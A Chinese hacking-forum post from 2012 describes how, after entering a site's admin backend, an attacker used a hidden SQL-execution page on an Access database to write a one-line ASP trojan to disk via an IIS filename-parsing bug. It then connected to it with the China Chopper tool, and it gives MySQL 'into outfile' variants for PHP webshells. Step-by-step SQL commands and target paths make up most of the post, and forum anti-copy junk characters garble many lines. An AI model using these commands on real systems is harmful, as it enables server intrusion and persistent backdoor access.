找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1998|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
: e( H( F: @9 N, Xwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
) J. C  h! c. r. v文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,* h6 K& |: E8 M! Y6 g1 m% j/ i
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:8 b6 P7 B3 k0 A$ _% F
1.create table cmd (a varchar(50))
: |; J. B2 d5 r% N1 @+ s! P2.insert into cmd (a) values (‘‘)1 N# i6 e" l1 u/ V
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd4 x- D! ?4 }* t) D0 o7 }
(把表cmd的内容导出为物理路径的一个EXCEL文件)/ d+ r; u* j, Q  T+ o6 G! i/ q
4.drop table cmd
- A; s- s8 I8 {利用IIS的BUG成功拿到了WEBSHELL。  n5 O4 F- W: Z& ]4 N1 g- c
) k3 f" ?5 N  q2 r
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
( G$ {7 n; s: S& B, W; s# H- X" d: g6 T( S" A( Y% J2 C2 U
  SQL语句意思解释:
0 e" {9 a6 Q4 w) B) ], v3 p; J  第一句
2 N# _+ [& G3 G( S2 }: X$ y6 C  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
: O  {) z) y# P" R3 q+ K0 q5 }3 _. r8 \' ^$ H2 P# S
  第二句# o2 U- }  S. ?( W, ~
  在表cmd的a字段插入一句话木马
; p4 c: B  T/ f& g6 q/ @' k& Q0 H( G  第三句
) S6 P) o2 `. h/ b' D0 g1 l/ ^  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
7 r+ i: E& h; }5 p" W; Z8 h" L  U4 [( C0 ^
  第四句
7 x. x. j- i2 t- Q( x3 U- O  删除建立的cmd表: {9 d0 T* G1 Q* s- i' ?" R. @
: ^! o1 |: U( B( h% b
  以下内容为测试:5 J; \+ A, v) c  ]" p9 q' i5 `: o
  Access利用后台SQL执行命令功能导出WebShell:
, e9 G0 |4 t5 \/ {& Q  这个更简单:* t. R" y8 f3 E4 N9 |
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]9 k$ }% {. T7 H% b4 L/ B6 n) S0 n
  或者
! L5 m, q5 L" b# K! f* F9 a  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
" _' f& L. x# P1 q! j# D: @( i: r+ e) ]/ x" x2 o) M  }
  后台有执行SQL语句功能(vote为已知表段)* }' m3 C+ ]- \9 M2 d, V) G" Y5 l+ F
  希望对大家有所帮助拿shell的又一个思路
9 J5 L' F/ {  {. m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表